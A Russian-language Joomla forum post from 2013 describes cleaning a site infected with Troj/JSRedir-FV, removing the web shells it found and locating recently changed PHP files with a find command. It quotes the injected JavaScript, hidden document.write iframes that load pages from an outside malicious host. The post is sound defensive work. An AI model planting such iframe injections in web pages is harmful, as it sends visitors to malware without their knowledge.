Чистим от заражения Troj/JSRedir-FV

Тема в разделе "Вопросы безопасности", создана пользователем CB9T, 20.01.2013.

Статус темы:
Закрыта.
  1. CB9T
    Offline

    CB9T Преподаватель по J! Команда форума

    Регистрация:
    21.05.2010
    Сообщения:
    2 464
    Симпатии:
    305
    Пол:
    Мужской
    Сегодня к сожалению обнаружил вирус на сайте (прислал весточку Яндекс), итак вирус добавляет в каждый файл iframe такого содержания:

    Код (PHP):
    1. document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://jfvavy.myddns.com/b019.jYAWO3YLrZW6Gi?default" height="110" width="110"></iframe>');


    и

    Код (PHP):
    1. document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://jfvavy.myddns.com/538f7f43b3.0WhHi8TzVrtztN?default" height="110" width="110"></iframe>');



    Для простоты эксперимента - зная, что необходимо удалять - берем replace.php или joomla-replace.php (я обозвал немного по другому)

    и сканируем по данной фразе сайт:
    Вирус найден в 400+ файлах:


    Далее задаем маску и чистим, также не забываем проверить еще раз и удалить сам скрипт замены! [!]



    0_77cc3_39dc930e_orig.png

    ----------------------------

    Рано радоваться! Надо найти шелл! я нашел из 10 сайтов только на 1 сайте шелл с названием:
    jos_40iw.php и j.php

    внутри комментарий (шелл от vBulletin 3.1.9)

    0_77cf3_8f863242_orig.png


    Чистим, сносим и все гуд!

    Однако и это не панацея.... самый верный способ оказался:

    Код (PHP):
    1. find /home/путь/ -type f -iname "*.php" -mtime -7


    найти все файлы созданные за 7 дней пхп :)

    и через replacer.php и WinSCP (или FTP) все заменить и бэкдоры удалить!
     
    Последнее редактирование: 20.01.2013
  2.  
Статус темы:
Закрыта.

Поделиться этой страницей

Загрузка...